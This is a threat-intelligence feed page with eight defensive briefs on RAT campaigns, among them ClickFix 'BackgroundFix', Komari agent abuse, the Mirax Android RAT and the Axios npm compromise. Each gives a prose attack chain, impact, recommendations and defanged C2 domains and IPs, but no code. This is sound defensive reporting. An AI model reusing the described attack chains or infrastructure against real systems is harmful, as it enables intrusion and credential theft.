Rat — CraftedSignal Threat Feed

ClickFix 'BackgroundFix' Campaign Delivers CastleLoader, NetSupport RAT, and CastleStealer

hello@craftedsignal.io — Thu, 30 Apr 2026 13:00:00 +0000

The BackgroundFix campaign is a social engineering scheme using fake “remove your photo background” services to deliver malware. Victims are lured to malicious sites mimicking legitimate image editing tools. The sites feature fake upload interfaces, progress bars, and download buttons to appear authentic. This campaign delivers a multi-stage payload, starting with CastleLoader. CastleLoader then drops NetSupport RAT, enabling remote access for the attackers, and CastleStealer, a custom .NET stealer designed to exfiltrate browser credentials, wallet extension data, and Telegram session files. This campaign appears to be active, with multiple domains sharing the same template.

Attack Chain

Victim searches for an online background removal tool and lands on a malicious BackgroundFix site.
The victim uploads an image to the fake website.
After clicking a checkbox, the site instructs the victim to copy a command to their clipboard.
The copied command executes finger.exe to query cheeshomireciple[.]com
finger.exe retrieves a batch script from the C2 server.
The batch script executes commands to download and execute further payloads.
CastleLoader is deployed, subsequently dropping NetSupport RAT and CastleStealer.
NetSupport RAT grants the attacker remote access, while CastleStealer exfiltrates sensitive data.

Impact

Successful attacks result in the installation of NetSupport RAT, granting attackers remote control over the compromised system. Additionally, CastleStealer exfiltrates sensitive information such as browser credentials, wallet extension data, and Telegram session files. This stolen data can be used for further malicious activities, including financial fraud, identity theft, and unauthorized access to sensitive accounts. The active nature of the campaign and the use of multiple domains suggest a broad targeting scope.

Recommendation

Monitor process creation events for the execution of finger.exe with command-line arguments pointing to external domains (IOC: cheeshomireciple[.]com).
Deploy the Sigma rule to detect the execution of finger.exe to identify potential initial access attempts.
Block the C2 domain cheeshomireciple[.]com at the DNS resolver to prevent initial payload delivery.
Monitor network connections for NetSupport RAT C2 communications on port 688 to detect compromised systems (IOCs: poronto[.]com:688, giovettiadv[.]com:688).

Komari Agent Abused as SYSTEM-Level Backdoor

hello@craftedsignal.io — Thu, 30 Apr 2026 00:00:00 +0000

Huntress discovered threat actors leveraging the Komari monitoring agent as a SYSTEM-level backdoor within a partner environment. Komari, a Go-based project on GitHub with over 4,000 stars, is designed as a remote-control and monitoring tool. This incident marks a publicly documented case of Komari being abused in a real-world intrusion. The attackers compromised VPN credentials to gain initial access before deploying the Komari agent as a persistent backdoor. Komari inherently functions as a command-and-control (C2) channel, with features enabled by default. The threat actor installed Komari as a Windows service named “Windows Update Service” using NSSM, directly from the official GitHub repository, which avoided the need for attacker-controlled staging infrastructure. The initial discovery occurred on April 16, 2026.

Attack Chain

Initial Access: The attacker establishes an SSLVPN session on a FortiGate device from IP address 45.153.34[.]132, authenticating as a legitimate user, [User 1].
Internal Reconnaissance: After establishing the VPN connection, the attacker’s workstation, identified as VM8514, begins enumerating the internal network from the tunnel IP 10.212.134[.]200.
Lateral Movement: Using Impacket’s smbexec.py, the attacker enables Remote Desktop Protocol (RDP) on the target workstation, [REDACTED-WRKSTN].
RDP Access: The attacker establishes an interactive RDP session to [REDACTED-WRKSTN].
Persistence - Service Creation: The attacker uses the Non-Sucking Service Manager (NSSM) to install the Komari agent as a persistent Windows service named “Windows Update Service”.
Agent Download: The Komari agent is downloaded from raw.githubusercontent[.]com/komari-monitor/komari-agent using a PowerShell one-liner executed directly on the system.
Command and Control: The Komari agent establishes a persistent WebSocket connection to its server, allowing the attacker to execute arbitrary commands (PowerShell/sh) and initiate interactive PTY reverse shell sessions.
Maintain Access & Execute: The attacker maintains SYSTEM-level access via the persistent Komari agent, enabling ongoing remote command execution and control over the compromised workstation.

Impact

This attack demonstrates how readily available monitoring tools can be weaponized for malicious purposes. A single compromised account led to the establishment of a SYSTEM-level backdoor on a critical workstation. This could result in data exfiltration, further lateral movement within the network, and potentially ransomware deployment. Microsoft Defender quarantined an earlier registry hive dumping attempt, preventing further data compromise. The number of affected organizations is currently unknown, but any organization using the Komari agent without proper security controls is potentially at risk.

Recommendation

Monitor FortiGate logs for SSLVPN sessions originating from suspicious IP addresses (45.153.34[.]132) and unusual ASN’s (ASN 51396) to detect potentially compromised credentials.
Implement the Sigma rule “Detect Komari Agent Installation via PowerShell” to identify installations of the Komari agent.
Monitor process creation events for the execution of nssm.exe installing a service named “Windows Update Service” to detect suspicious service installations.
Block the domain raw.githubusercontent[.]com at the DNS resolver or web proxy to prevent the downloading of malicious tools and payloads.

Mirax RAT Targeting Android Users in Europe

hello@craftedsignal.io — Thu, 16 Apr 2026 12:00:00 +0000

The Mirax RAT is a newly identified Android Remote Access Trojan (RAT) that has been actively targeting users in Europe since March 2026. It’s offered as Malware-as-a-Service (MaaS) to a small group of affiliates, primarily Russian-speaking actors, through tiered subscription models. Since December 2025, Mirax has been promoted on underground forums and used in multiple campaigns. The RAT’s distribution relies on malicious advertisements on Meta platforms like Facebook, Instagram, and Messenger, with over 200,000 users potentially exposed to these ads. The malware uses dropper pages hosted on GitHub and relies on APK sideloading for execution, bypassing the Google Play Store’s security measures. Mirax’s capabilities extend beyond typical RAT functions, including turning infected devices into residential proxy nodes via a SOCKS5 proxy.

Attack Chain

The attacker creates malicious ads on Facebook, Instagram, and Messenger promoting IPTV application services.
Users click on the advertisements, which redirect them to dropper pages hosted on GitHub.
The user is prompted to enable installation from unknown sources on their Android device.
The malicious IPTV application is installed via APK sideloading.
The application initiates a multi-stage infection process, utilizing Golden Encryption (Golden Crypt) to pack the payload.
The payload, an encrypted Dalvik Executable (.dex) file, is decrypted during installation using the RC4 stream cipher with a hardcoded key.
Mirax gains control of the device, enabling overlay and notification injection for credential theft.
Attackers can view the screen in real-time, navigate and control the device, manage applications, exfiltrate images and text, and launch a SOCKS5 proxy connection to proxy traffic through the infected device.

Impact

The Mirax RAT campaign has the potential to affect a large number of Android users in Europe. The malicious advertisements have already reached over 200,000 users. Successful infections can lead to credential theft, financial fraud, data exfiltration, and the compromised device being used as a residential proxy, potentially masking malicious activity and further expanding the attacker’s reach. Banks and financial institutions are specifically highlighted as high-value targets.

Recommendation

Monitor network traffic for connections to GitHub domains associated with APK downloads, and correlate that with android device user agents (Network Connection and User Agent logs).
Implement detections for process creation events related to sideloaded APK installations, specifically looking for unusual parent-child process relationships (Process Creation Logs).
Deploy the Sigma rule provided below to detect the execution of applications from untrusted sources and tune for your environment.
Monitor network connections for SOCKS5 proxy traffic originating from Android devices, which may indicate compromised devices acting as residential proxies (Network Connection Logs).

Axios npm Package Compromised via Social Engineering

hello@craftedsignal.io — Sat, 04 Apr 2026 20:30:42 +0000

On April 4, 2026, the maintainers of the Axios HTTP client disclosed a social engineering attack targeting one of their developers. The attack, attributed to the North Korean threat actor UNC1069, involved impersonating a legitimate company to build trust with the targeted developer. The attacker used a fake Microsoft Teams update disguised as a critical error fix to deploy a remote access trojan (RAT). This RAT allowed the attackers to gain access to the developer’s system and npm credentials. The attackers then published two malicious versions of Axios (1.14.1 and 0.30.4) to the npm package registry. These malicious versions included a dependency called plain-crypto-js, which installed a RAT on macOS, Windows, and Linux systems. These versions were available for three hours, posing a supply chain risk to any systems that installed them during that period.

Attack Chain

The attacker identifies a target developer and initiates contact via LinkedIn/Slack, impersonating a legitimate company.
The attacker invites the developer to a Slack workspace populated with fake profiles and staged company activity.
A meeting is scheduled on Microsoft Teams, during which a fake “RTC Connection” error message is displayed.
The attacker prompts the developer to install a “Teams update” to resolve the error.
The fake update is a RAT malware, granting the attacker remote access to the developer’s machine.
The attacker steals the developer’s npm credentials, bypassing MFA due to already authenticated session.
The attacker publishes malicious versions of the Axios package (1.14.1 and 0.30.4) to the npm registry, injecting the plain-crypto-js dependency.
Systems installing the compromised Axios versions download and execute the plain-crypto-js package, resulting in RAT deployment and credential theft.

Impact

The compromise of the Axios npm package created a supply chain attack impacting an unknown number of systems across various sectors. Systems that installed the malicious versions (1.14.1 and 0.30.4) within the three-hour window are considered compromised. Successful exploitation results in the installation of a remote access trojan (RAT) capable of stealing credentials, browser data, and other sensitive information from macOS, Windows, and Linux systems. This can lead to further unauthorized access, data breaches, and potential financial loss.

Recommendation

Monitor npm package installations for the presence of the plain-crypto-js dependency, particularly in projects that use Axios versions 1.14.1 or 0.30.4.
Implement multi-factor authentication (MFA) for npm accounts and other developer accounts, but recognize that authenticated sessions can be hijacked.
Deploy the Sigma rule “Detect Suspicious NPM Package Installation” to detect potentially malicious package installations based on unusual parent processes (see below).
Block the domain associated with the malicious dependency plain-crypto-js at the DNS resolver.
Educate developers about social engineering tactics and the risks of installing software from untrusted sources.

Axios NPM Supply Chain Attack Delivering Platform-Specific RATs

hello@craftedsignal.io — Sat, 04 Apr 2026 12:00:00 +0000

On March 31, 2026, the official Axios node package manager (npm) package was compromised in a supply chain attack. The attack resulted in the deployment of two malicious versions, v1.14.1 and v0.30.4. Axios is a widely-used JavaScript library for making HTTP requests, with approximately 100 million downloads per week. The malicious packages were available for around three hours. The compromised packages introduced a fake runtime dependency, ‘plain-crypto-js’, that executes automatically after installation. This dependency then communicates with attacker-controlled infrastructure at 142.11.206.73, pulling down platform-specific payloads for Linux, MacOS, and Windows. The payloads are remote access trojans (RATs), enabling the attackers to gather information and execute additional malicious activities.

Attack Chain

The attacker compromised the Axios NPM package and injected malicious code.
Malicious versions v1.14.1 and v0.30.4 were published to the NPM registry.
The malicious packages introduce a fake runtime dependency named ‘plain-crypto-js’.
Upon installation of the compromised package, the ‘plain-crypto-js’ dependency executes automatically via a post-install script.
The dependency connects to the attacker-controlled IP address 142.11.206.73 to retrieve a platform-specific payload.
On MacOS, a binary named “com.apple.act.mond” is downloaded and executed using zsh.
On Windows, a PowerShell script (6202033.ps1) is downloaded, and the legitimate powershell.exe is copied to “%PROGRAM DATA%\wt.exe”, and the ps1 script is executed with hidden and execution policy bypass flags.
On Linux, a Python backdoor is downloaded and executed. The downloaded executables act as Remote Access Trojans (RATs) exfiltrating credentials and enabling remote management.

Impact

This supply chain attack could lead to significant compromise across numerous organizations using the Axios library. The actors exfiltrate credentials and gain remote management capabilities. All credentials present on systems that installed the malicious package should be considered compromised and immediately rotated. The widespread use of Axios means the impact could extend to many applications and systems, potentially enabling further attacks leveraging compromised credentials. Supply chain attacks like these affecting widely used libraries, as seen in 25% of the top 100 vulnerabilities in the Cisco Talos 2025 Year in Review, highlight the substantial risk they pose.

Recommendation

Roll back to safe Axios versions (v1.14.0 or v0.30.3) immediately to prevent further compromise, as mentioned in the overview.
Investigate systems that downloaded malicious packages (v1.14.1 or v0.30.4) for signs of follow-on payloads from the actor-controlled infrastructure, as described in the overview.
Block the actor-controlled IP address 142.11.206.73 and domain Sfrclak.com at the network perimeter to prevent further communication with the malicious infrastructure, per the IOC list.
Monitor for execution of PowerShell scripts from unusual locations, specifically “%PROGRAM DATA%\wt.exe”, as part of the attack chain.
Implement a process creation rule to alert when processes connect to external IPs using uncommon parent processes. See example rule below.

Compromised Axios Library Leads to RAT Deployment via @usebruno/cli

hello@craftedsignal.io — Fri, 03 Apr 2026 12:00:00 +0000

On March 31, 2026, a supply chain attack targeted the axios npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of @usebruno/cli. This attack specifically impacted users of the @usebruno/cli who performed an npm install within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the postinstall phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.

Attack Chain

Attacker compromises the axios npm package, injecting malicious code into versions 1.14.1 and 0.30.4.
The compromised axios package is published to the npm registry.
A user of @usebruno/cli executes npm install within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).
The npm package manager resolves the dependency chain and downloads the compromised axios package as a dependency of @usebruno/cli.
The malicious code within the axios package executes during the postinstall script phase of the installation process.
The postinstall script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user’s system.
The RAT establishes a connection to a remote command-and-control (C2) server.
The attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.

Impact

This supply chain attack could have resulted in widespread compromise of developer systems that used the @usebruno/cli. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.

Recommendation

If @usebruno/cli was installed during the affected window, reinstall dependencies to ensure a clean version of axios is used (reference: Impact section).
Rotate all credentials and secrets that were present on systems where @usebruno/cli was installed during the affected window (reference: Impact section).
Review and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat).
Monitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - “Detect Suspicious Process Spawned by NPM”).

PylangGhost RAT Observed on npm Registry

hello@craftedsignal.io — Mon, 16 Mar 2026 04:45:53 +0000

A new remote access trojan (RAT) named PylangGhost has been discovered on the npm registry. This marks the first known instance of this specific RAT being distributed via a software supply chain attack on the npm ecosystem. The RAT is named for its use of Python and potentially for obfuscation or evasion techniques. The affected npm packages are designed to inject malicious code into projects that depend on them. This malicious code facilitates unauthorized remote access to infected systems, thereby providing threat actors with the ability to exfiltrate sensitive data, deploy further malware, or perform other malicious activities. This is a supply chain attack that endangers developers and applications.

Attack Chain

A developer installs a malicious package from the npm registry containing PylangGhost.
During the installation process, a post-install script or similar mechanism executes, injecting the PylangGhost RAT into the developer’s environment.
The RAT establishes a connection to a command-and-control (C2) server controlled by the attacker.
The C2 server sends commands to the infected system, instructing the RAT to perform specific actions.
The RAT executes the commands, potentially including data exfiltration, downloading and executing additional payloads, or establishing persistence.
Sensitive data, such as credentials, API keys, or source code, is exfiltrated from the compromised system to the C2 server.
The attacker gains remote access and control over the compromised system, enabling further malicious activities.

Impact

The presence of PylangGhost on the npm registry introduces a significant supply chain risk. Successful infection allows attackers to gain remote access to developer systems, potentially leading to the theft of sensitive source code, credentials, and other proprietary information. The compromise can extend to applications built using the infected packages, impacting downstream users and potentially leading to widespread data breaches or service disruptions. The number of affected victims is currently unknown, but the risk is widespread due to the popularity of the npm registry.

Recommendation

Monitor npm package installations for suspicious post-install scripts or unexpected network connections (see related Sigma rules).
Implement strong dependency scanning tools to identify and remove potentially malicious packages from your projects.
Analyze network connection logs for connections to unusual or malicious domains after npm package installations (see related Sigma rules).
Enable process monitoring for any processes spawned during or after npm package installations.

Fileless Multi-Stage Remcos RAT via Phishing

hello@craftedsignal.io — Sun, 15 Mar 2026 15:34:12 +0000

This threat brief discusses a Remcos RAT infection chain that utilizes a fileless, multi-stage approach. While specific details regarding the initial phishing lure, exploitation method, and Remcos RAT version are absent from the original report, the core focus is on the fileless execution and memory residency of the RAT. The attack begins with an unspecified phishing attack and culminates in a Remcos RAT running entirely in memory, hindering traditional disk-based forensic analysis. This type of attack poses a significant challenge to traditional endpoint detection and response (EDR) solutions. The scope and scale of this campaign are unknown, but fileless techniques are generally employed in targeted attacks.

Attack Chain

An unsuspecting user receives a phishing email containing a malicious attachment or link (specific delivery mechanism not specified).
The user interacts with the malicious content, initiating the first stage of the attack.
A script (e.g., PowerShell, VBScript) is executed, likely delivered through the phishing attachment/link.
The script downloads and executes additional payloads directly into memory, avoiding writing files to disk.
The downloaded payload injects Remcos RAT into a legitimate system process (process injection).
Remcos RAT establishes a command and control (C2) connection with the attacker’s server for further instructions.
The attacker can then perform various malicious activities such as data exfiltration, keylogging, or lateral movement.
The Remcos RAT persists in memory, potentially evading detection by signature-based antivirus solutions.

Impact

The successful deployment of Remcos RAT can lead to significant data breaches, intellectual property theft, and financial losses. Victims may experience system instability, unauthorized access to sensitive information, and reputational damage. The fileless nature of the attack makes it harder to detect and remediate, potentially prolonging the dwell time and increasing the overall impact. The number of victims and targeted sectors are not specified in the original source.

Recommendation

Enable PowerShell script block logging and transcription to enhance visibility into potentially malicious script execution (reference attack chain step 3).
Monitor process creation events for suspicious parent-child relationships (e.g., cmd.exe or powershell.exe spawning uncommon processes) to detect injected Remcos processes (reference attack chain step 5).
Deploy the Sigma rules provided below to your SIEM and tune them for your specific environment.
Implement application control policies to restrict the execution of unauthorized or unknown scripts and binaries (reference attack chain step 4).